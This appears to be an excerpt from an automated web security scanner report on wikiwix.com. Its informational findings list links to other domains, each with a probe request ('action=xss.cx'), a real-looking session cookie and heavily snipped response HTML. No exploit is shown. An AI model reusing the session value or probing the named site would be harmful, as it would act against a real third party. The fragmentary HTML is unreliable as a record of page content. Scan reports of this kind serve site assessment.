<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.4. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en&action=xss.cx&disp=news HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 22328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:July_31,_2007">July 31, 2007</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Published">Published</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Archived">Archived</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Science_and_technology">Science and technology</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Computing">Computing</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Internet">Internet</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.facebook.com">Facebook main page</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.dagbladet.no/dinside/2007/07/31/507621.html">Andre kan lese dine meldinger p.. Facebook</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://news.com.com/8301-13577_3-9752567-36.html">Facebook experiencing 'upgrade' outages</a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/MySpace' target='_blank'> MySpace </a></li><li><a href ='http://en.wikipedia.org/wiki/Myspace' target='_blank'> Myspace </a></li><li><a href ='http://en.wikipedia.org/wiki/Cross-site scripting' target='_blank'> Cross-site scripting </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/XSS 10' target='_blank'> XSS 10 </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS Worm' target='_blank'> XSS Worm </a></li><li><a href ='http://en.wikipedia.org/wiki/Samy (XSS)' target='_blank'> Samy (XSS) </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/CX717' target='_blank'> CX717 </a></li><li><a href ='http://en.wikipedia.org/wiki/..' target='_blank'> .. </a></li><li><a href ='http://en.wikipedia.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href='http://en.wikinews.org/wiki/Facebook down for "upgrades"; multiple blogs suggest site was hacked'>Facebook down for "upgrades"; multiple blogs suggest site was hacked</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Archived" target="_blanck">Archived</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Computing" target="_blanck">Computing</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Internet" target="_blanck">Internet</a></li><li><a href="http://en.wikipedia.org/wiki/Category:July_31,_2007" target="_blanck">July 31, 2007</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Published" target="_blanck">Published</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Science_and_technology" target="_blanck">Science and technology</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.5. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en&action=xss.cx&disp=book HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:55 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 45131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Tcl">Tcl</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Books_with_print_version">Books with print version</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:X86_Assembly">X86 Assembly</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Pages_needing_attention">Pages needing attention</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:X86_Assembly/Stubs">X86 Assembly / Stubs</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Books_to_be_broken_into_subpages">Books to be broken into subpages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:XML_-_Managing_Data_Exchange">XML - Managing Data Exchange</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Cultural_Anthropology">Cultural Anthropology</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:The_Unicyclopedia">The Unicyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Using_Firefox">Using Firefox</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Algebra_textbook_pages">Algebra textbook pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Modules_now_merged_into_other_modules">Modules now merged into other modules</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:LPI_Linux_Certification">LPI Linux Certification</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.tcl.tk/software/tcltk/license_terms.html">license</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://wiki.tcl.tk/10259">simple</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://tmml.sourceforge.net/doc/tcllib/snitfaq.html">Snit</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikibooks.org/w/index.php?title=X86_Assembly/Print_Version&amp;action=purge&amp;printable=yes">Refresh this page</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikibooks.org/w/index.php?title=X86_Assembly/Print_Version&amp;printable=yes">printable version</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.ctyme.com/rbrown.htm">Ralph Brown's Interrupt List.</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.inkscape.org/">Inkscape</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.mathworks.com/matlabcentral/fileexchange/15958-2d-apollonian-gasket-with-four-identical-circles">2D Apollonian gasket with four identical circles by Guillaume JACQUENOT ..</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://windward.hawaii.edu/facstaff/dagrossa-p/articles/EatingChristmas.pdf">case study done by Richard Borshay Lee</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.schlumpf.ch/uni_engl_geschichte.htm">Schlumpf geared unicycle</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://schlumpfdrive.com/?sl=en&amp;sid=&amp;u_s=0&amp;u_a=22">(new Schlumpf homepage)</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://staff.washington.edu/gharper/">Greg Harper</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikibooks.org/w/index.php?title=Using_Firefox/Print&amp;action=purge&amp;printable=yes">Refresh this page</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://update.mozilla.org/extensions/moreinfo.php?id=17&amp;page=releases">Chromedit</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://update.mozilla.org/extensions/moreinfo.php?id=179&amp;page=releases">EditCSS</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikibooks.org/wiki/Image:Image-2496475710098511775S600x600Q85.jpg">Social networking</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://http://www.comscore.com/">comScore</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.youtube.com/user/leelefever">In Plain English </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/MySpace' target='_blank'> MySpace </a></li><li><a href ='http://en.wikipedia.org/wiki/Myspace' target='_blank'> Myspace </a></li><li><a href ='http://en.wikipedia.org/wiki/Cross-site scripting' target='_blank'> Cross-site scripting </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/XSS 10' target='_blank'> XSS 10 </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS Worm' target='_blank'> XSS Worm </a></li><li><a href ='http://en.wikipedia.org/wiki/Samy (XSS)' target='_blank'> Samy (XSS) </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/CX717' target='_blank'> CX717 </a></li><li><a href ='http://en.wikipedia.org/wiki/..' target='_blank'> .. </a></li><li><a href ='http://en.wikipedia.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/Tcl Programming/Print version">Tcl Programming/Print version</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:I18ntester_ce.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=I18ntester_ce.jpg&amp;width=56x56&amp;lang=en" alt="I18ntester_ce" border="0" width="56" height="56" title="click to enlarge that picture">
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/X86 Assembly/Print Version">X86 Assembly/Print Version</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG">XML - Managing Data Exchange/SVG</a>
...[SNIP]...
<h2><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">{lp..A_gtF`p_CX**u..**</a>
...[SNIP]...
<span><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html</a>
...[SNIP]...
<h2><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">Job for Professional Group ExercisesTrainers (CX), Saudi Arabia | JobsNama</a>
...[SNIP]...
<span><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict">Cultural Anthropology/Social Stratification, Power and Conflict</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware">The Unicyclopedia/Hardware</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/Using Firefox/Print">Using Firefox/Print</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/Algebra/Systems of linear equations">Algebra/Systems of linear equations</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0">Emerging Instructional Technology/Web 2.0</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Image-2496475710098511775S600x600Q85.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Image-2496475710098511775S600x600Q85.jpg&amp;width=56x56&amp;lang=en" alt="Image-2496475710098511775S600x600Q85" border="0" width="56" height="56" titl
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands">LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters">LPI Linux Certification/Process Text Streams Using Filters</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Tcl" target="_blanck">Tcl</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Books_with_print_version" target="_blanck">Books with print version</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Pages_needing_attention" target="_blanck">Pages needing attention</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:X86_Assembly" target="_blanck">X86 Assembly</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:X86_Assembly/Stubs" target="_blanck">X86 Assembly/Stubs</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Books_to_be_broken_into_subpages" target="_blanck">Books to be broken into subpages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:XML_-_Managing_Data_Exchange" target="_blanck">XML - Managing Data Exchange</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Cultural_Anthropology" target="_blanck">Cultural Anthropology</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:The_Unicyclopedia" target="_blanck">The Unicyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Books_with_print_version" target="_blanck">Books with print version</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Using_Firefox" target="_blanck">Using Firefox</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Algebra_textbook_pages" target="_blanck">Algebra textbook pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:LPI_Linux_Certification" target="_blanck">LPI Linux Certification</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Modules_now_merged_into_other_modules" target="_blanck">Modules now merged into other modules</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:LPI_Linux_Certification" target="_blanck">LPI Linux Certification</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.6. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en&action=xss.cx&disp=quote HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 21802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikiquote.org/wiki/Category:Memes">Memes</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://snowclones.org/2007/09/18/x-me-no-xs/">The Snowclone Database: X me no Xs</a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/MySpace' target='_blank'> MySpace </a></li><li><a href ='http://en.wikipedia.org/wiki/Myspace' target='_blank'> Myspace </a></li><li><a href ='http://en.wikipedia.org/wiki/Cross-site scripting' target='_blank'> Cross-site scripting </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/XSS 10' target='_blank'> XSS 10 </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS Worm' target='_blank'> XSS Worm </a></li><li><a href ='http://en.wikipedia.org/wiki/Samy (XSS)' target='_blank'> Samy (XSS) </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/CX717' target='_blank'> CX717 </a></li><li><a href ='http://en.wikipedia.org/wiki/..' target='_blank'> .. </a></li><li><a href ='http://en.wikipedia.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
